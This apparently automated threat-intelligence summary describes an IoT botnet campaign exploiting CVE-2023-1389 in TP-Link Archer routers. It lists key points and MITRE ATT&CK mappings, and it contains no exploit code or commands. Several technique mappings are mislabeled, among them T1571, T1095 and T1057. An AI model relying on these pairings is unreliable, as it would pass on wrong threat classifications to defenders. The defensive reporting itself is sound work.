A recent global campaign has been identified that targets TP-Link Archer routers through a remote code execution (RCE) vulnerability (CVE-2023-1389). The campaign exploits these routers to create a botnet, with the potential for widespread impact given the number of vulnerable devices connected to the internet. The malware dropper utilizes a bash script to install and execute additional malware while maintaining evasion techniques. Affected: IoT devices, TP-Link Archer routers
Keypoints :
- A global IoT botnet campaign targets TP-Link Archer routers through CVE-2023-1389.
- Vulnerabilities persist due to infrequent firmware updates by users and negligence in security by manufacturers.
- The botnet is believed to remain active, with over 6,000 vulnerable devices detected.
- The campaign incorporates a malware dropper that executes code remotely and seeks to spread itself.
- The threat actor associated with this campaign is potentially based in Italy and has shown adaptation tactics for evasion.
MITRE Techniques :
- T1571: Application Layer Protocol – Utilizes HTTP to communicate and send commands.
- T1071.001: Application Layer Protocol: Web Protocols – Employs web protocols for communication with a C2 server.
- T1222.002: File Permissions Modification – Sets full permissions on the dropper file for execution.
- T1070.004: Indicator Removal on Host – The malware dropper deletes itself post-execution to avoid detection.
- T1083: File and Directory Discovery – The malware attempts to access various sensitive system files.
- T1059.004: Command and Scripting Interpreter: Unix Shell – Executes shell commands on compromised devices.
- T1499: Endpoint Denial of Service – Executes distributed denial-of-service (DDoS) attacks upon command.
- T1190: Exploit Public-Facing Application – Exploits the CVE-2023-1389 vulnerability to spread across devices.
- T1057: Process Discovery – Kills previous instances of itself to avoid detection.
- T1005: Data from Local System – Reads configuration files potentially for malicious activities.
- T1573: Encrypted Channel – Sets up an encrypted C2 communication channel.
- T1095: Service Execution – Maintains a background thread for continuous operations.
Indicator of Compromise :
- No IoC Found